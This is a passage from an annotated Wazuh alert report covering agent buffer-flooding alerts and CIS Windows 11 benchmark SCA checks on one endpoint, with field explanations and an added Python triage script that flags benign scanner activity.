Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is flooded. Check the agent configuration.

🧠 What happened? Agent event queue is flooded. Check the agent configuration.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:43:35.002+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -
Sustained drop. Two remedies: raise queue_size and events_per_second under <client_buffer> in the agent's ossec.conf (Wazuh defaults are 5000 and 500), or, better, reduce the source: if a scheduled SCA scan produces one Sysmon Event ID 1 per check, exclude the agent's own child processes in the Sysmon config or space the scan out. Confirm afterwards that the agent's buffer state returns to normal.

🔍 Full Alert Details
timestamp:  2025-04-24T22:43:35.002+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is flooded. Check the agent configuration.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  204
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534615.2342364
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: 'flooded'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  flooded
Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  12
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority. The 12 shown here is outside that range and equals rule.level, so read it as the raw Wazuh level passed through; the 0‑10 bands do not apply to it.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
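Three points a practitioner would check before acting on the Sysmon alerts above (an agent working directory and known SCA commands for the `net accounts` and SecEdit events, the `__PSScriptPolicyTest_*.ps1` probe for the file-create event, WOW64 path redirection) plus a collection-gap marker for the agent-buffer alerts, as one triage script. This is an added example written for this page, not SOCscribe's or Wazuh's own code. The alert dicts are constructed from the values in the report and trimmed to the fields the checks read; the two SCA command patterns are an assumption based on what this report shows, and a real deployment would extend them from its own SCA policy.

```python
"""Triage helpers for Wazuh/Sysmon alerts in the layout of this report.
Added example, not SOCscribe or Wazuh code; field paths follow the alert
fields shown above (data.win.system.*, data.win.eventdata.*, rule.groups)."""
from __future__ import annotations
import re

# Commands the Wazuh SCA CIS checks run, as seen in this report (assumption: extend from your SCA policy).
SCA_COMMAND_PATTERNS = (
    re.compile(r"\bnet1?(\.exe)?\s+accounts\b", re.I),
    re.compile(r'\bsecedit(\.exe)?"?\s+/export\s+/cfg\b', re.I),
)
# Probe file PowerShell writes on every start to test AppLocker/WDAC script policy.
POLICY_TEST_RE = re.compile(r"\\__PSScriptPolicyTest_[^\\]+\.ps1$", re.I)
AGENT_DIR_MARKER = "\\ossec-agent\\"  # Wazuh agent install folder on Windows

def _win(alert: dict, part: str) -> dict:
    return alert.get("data", {}).get("win", {}).get(part, {})

def is_powershell_policy_test(alert: dict) -> bool:
    """Sysmon EID 11 where powershell.exe wrote its own __PSScriptPolicyTest probe."""
    ev = _win(alert, "eventdata")
    return (str(_win(alert, "system").get("eventID")) == "11"
            and ev.get("image", "").lower().endswith("powershell.exe")
            and POLICY_TEST_RE.search(ev.get("targetFilename", "")) is not None)

def wazuh_sca_indicators(alert: dict) -> list[str]:
    """Reasons an EID 1 alert looks like a Wazuh SCA check; empty list means none."""
    ev, reasons = _win(alert, "eventdata"), []
    if str(_win(alert, "system").get("eventID")) != "1":
        return reasons
    if AGENT_DIR_MARKER.lower() in ev.get("currentDirectory", "").lower():
        reasons.append("working directory is the Wazuh agent folder")
    if ev.get("parentImage", "").lower().endswith("wazuh-agent.exe"):
        reasons.append("parent is wazuh-agent.exe")
    for field in ("commandLine", "parentCommandLine"):
        if any(p.search(ev.get(field, "")) for p in SCA_COMMAND_PATTERNS):
            reasons.append(f"{field} matches a known SCA benchmark check")
    return reasons

def wow64_redirected(alert: dict) -> bool:
    """system32 on the command line but a SysWOW64 image: WOW64 file-system
    redirection for a 32-bit parent, not a binary sitting in a relocated path."""
    ev = _win(alert, "eventdata")
    return ("\\syswow64\\" in ev.get("image", "").lower()
            and "\\system32\\" in ev.get("commandLine", "").lower())

def is_agent_flooding(alert: dict) -> bool:
    return "agent_flooding" in alert.get("rule", {}).get("groups", [])

def buffer_gap_window(alerts: list[dict]) -> tuple[str, str] | None:
    """Span from first to last agent-buffer alert: events may be missing in it."""
    stamps = sorted(a["timestamp"] for a in alerts if is_agent_flooding(a))
    return (stamps[0], stamps[-1]) if stamps else None

def triage(alert: dict) -> dict:
    """Attach notes and a coarse verdict. Nothing here auto-closes an alert."""
    notes = []
    if is_powershell_policy_test(alert):
        notes.append("PowerShell __PSScriptPolicyTest probe, not an ingress tool; tune the rule")
    if sca := wazuh_sca_indicators(alert):
        notes.append("looks like a Wazuh SCA scan (" + "; ".join(sca)
                     + "); confirm the parent chain ends at wazuh-agent.exe")
    if wow64_redirected(alert):
        notes.append("SysWOW64 image via WOW64 redirection; the location is standard")
    if is_agent_flooding(alert):
        notes.append("agent buffer pressure; Sysmon events from this host may be missing")
        verdict = "operational"
    else:
        verdict = "likely-benign, verify" if notes else "investigate"
    return {"rule_id": alert.get("rule", {}).get("id"), "verdict": verdict, "notes": notes}

def _sysmon(eid: int, ts: str, rule_id: str, **ev: str) -> dict:
    """Constructed Sysmon alert in the report's layout (sample data, not a real event)."""
    return {"timestamp": ts, "rule": {"id": rule_id, "groups": ["sysmon", "windows"]},
            "data": {"win": {"system": {"eventID": str(eid)}, "eventdata": ev}}}

# Constructed samples mirroring the alerts above, trimmed to the fields the checks read.
SAMPLE_ALERTS = [
    _sysmon(1, "2025-04-24T22:42:55.110+0000", "92031", image="C:\\Windows\\SysWOW64\\net1.exe",
            commandLine="C:\\WINDOWS\\system32\\net1 accounts", parentCommandLine="net.exe accounts",
            currentDirectory="C:\\Program Files (x86)\\ossec-agent\\",
            parentImage="C:\\Windows\\SysWOW64\\net.exe"),
    _sysmon(11, "2025-04-24T22:43:00.702+0000", "92205",
            image="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
            targetFilename="C:\\Windows\\SystemTemp\\__PSScriptPolicyTest_p4vcdh3q.d4n.ps1"),
    _sysmon(1, "2025-04-24T22:43:04.484+0000", "92066", image="C:\\Windows\\SysWOW64\\SecEdit.exe",
            commandLine='"C:\\WINDOWS\\system32\\SecEdit.exe" /export /cfg C:\\WINDOWS\\TEMP/secexport.cfg',
            currentDirectory="C:\\Program Files (x86)\\ossec-agent\\",
            parentImage="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
            parentCommandLine='powershell "$null = secedit /export /cfg $env:temp/secexport.cfg; '
                              '$(gc $env:temp/secexport.cfg | Select-String \\"LSAAnonymousNameLookup\\")'
                              '.ToString().Split(\\"=\\")[1].Trim()"'),
    {"timestamp": "2025-04-24T22:43:13.995+0000", "rule": {"id": "202", "groups": ["wazuh", "agent_flooding"]}},
    {"timestamp": "2025-04-24T22:43:35.002+0000", "rule": {"id": "204", "groups": ["wazuh", "agent_flooding"]}},
]

if __name__ == "__main__":
    for r in map(triage, SAMPLE_ALERTS):
        print(r["rule_id"], r["verdict"], *r["notes"], sep=" | ")
    print("collection gap:", buffer_gap_window(SAMPLE_ALERTS))
```

Each helper returns a reason rather than a decision: `triage()` only downgrades an alert to 'likely-benign, verify', so the analyst still walks parentProcessGuid up to wazuh-agent.exe, and `buffer_gap_window()` yields the span in which a missing Sysmon event proves nothing. Running the file prints the verdict and notes for each sample alert.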

Agent event queue is full. Events may be lost.

🧠 What happened? Agent event queue is full. Events may be lost.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:43:39.887+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -
Still saturated: the buffer went 90 % (22:43:13), full (22:43:19), flooded (22:43:35) and is full again four seconds later, so the burst is ongoing rather than a one-off spike. Extend the collection gap for agent 001 until the buffer alerts stop, and prioritise stopping the event source over buffer tuning.

🔍 Full Alert Details
timestamp:  2025-04-24T22:43:39.887+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is full. Events may be lost.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  203
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534619.2342637
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: 'full'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  full
Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is flooded. Check the agent configuration.

🧠 What happened? Agent event queue is flooded. Check the agent configuration.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:43:54.634+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:43:54.634+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is flooded. Check the agent configuration.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  204
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534634.2342883
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: 'flooded'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  flooded
Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  12
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from 'not applicable' to passed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from 'not applicable' to passed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:44:05.106+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:05.106+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from 'not applicable' to passed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19015
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['2.3.10.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534645.2343156
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26042
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines whether an anonymous user can request security identifier (SID) attributes for another user, or use a SID to obtain its corresponding user name. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  If this policy setting is enabled, a user with local access could use the well-known Administrator's SID to learn the real name of the built-in Administrator account, even if it has been renamed. That person could then use the account name to initiate a password guessing attack.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\Security Options\Network access: Allow anonymous SID/Name translation
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  2.3.10.1
CIS benchmark control ID for this individual check – same value as rule.cis above, handy for cross‑referencing the benchmark document.

data.sca.check.command:  ['powershell "$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \\"LSAAnonymousNameLookup\\").ToString().Split(\\"=\\")[1].Trim()"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from 'not applicable' to passed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from 'not applicable' to passed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:44:07.471+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:07.471+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from 'not applicable' to passed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19015
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.5.6']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
CIS Critical Security Controls (CIS CSC) safeguard the rule maps to – the framework‑level counterpart of the benchmark ID in rule.cis.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534647.2346388
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26156
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Special Logon' is set to include 'Success'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory reports when a special logon is used. A special logon is a logon that has administrator-equivalent privileges and can be used to elevate a process to a higher level. Events for this subcategory include: - 4964 : Special groups have been assigned to a new logon. The recommended state for this setting is to include: Success.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing these events may be useful when investigating a security incident.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Logon/Logoff\Audit Special Logon
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.5.6
CIS benchmark control ID for this individual check – same value as rule.cis above, handy for cross‑referencing the benchmark document.

data.sca.check.compliance.cis_csc:  8.5
CIS Critical Security Controls (CIS CSC) safeguard this check maps to – matches rule.cis_csc above.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Special Logon"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from 'not applicable' to failed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from 'not applicable' to failed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:10.468+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:10.468+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from 'not applicable' to failed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19014
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.6.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['3.3', '8.5']
CIS Critical Security Controls (CIS CSC) safeguards the rule maps to – the framework‑level counterpart of the benchmark ID in rule.cis.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534650.2349020
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26157
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Detailed File Share' is set to include 'Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory allows you to audit attempts to access files and folders on a shared folder. Events for this subcategory include: - 5145: network share object was checked to see whether client can be granted desired access. The recommended state for this setting is to include: Failure.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing the Failures will log which unauthorized users attempted (and failed) to get access to a file or folder on a network share on this computer, which could possibly be an indication of malicious intent.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Detailed File Share
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.6.1
CIS benchmark control ID for this individual check – same value as rule.cis above, handy for cross‑referencing the benchmark document.

data.sca.check.compliance.cis_csc:  3.3,8.5
CIS Critical Security Controls (CIS CSC) safeguards this check maps to – matches rule.cis_csc above.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Detailed File Share"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:13.568+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:13.568+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19014
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.6.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['3.3', '8.5']
CIS Critical Security Controls (CIS CSC) safeguards the rule maps to – the framework‑level counterpart of the benchmark ID in rule.cis.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534653.2351868
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26158
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit File Share' is set to 'Success and Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to audit attempts to access a shared folder. The recommended state for this setting is: Success and Failure. Note: There are no system access control lists (SACLs) for shared folders. If this policy setting is enabled, access to all shared folders on the system is audited.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  In an enterprise managed environment, workstations should have limited file sharing activity, as file servers would normally handle the overall burden of file sharing activities. Any unusual file sharing activity on workstations may therefore be useful in an investigation of potentially malicious activity.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit File Share
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.6.2
CIS benchmark control ID for this individual check – same value as rule.cis above, handy for cross‑referencing the benchmark document.

data.sca.check.compliance.cis_csc:  3.3,8.5
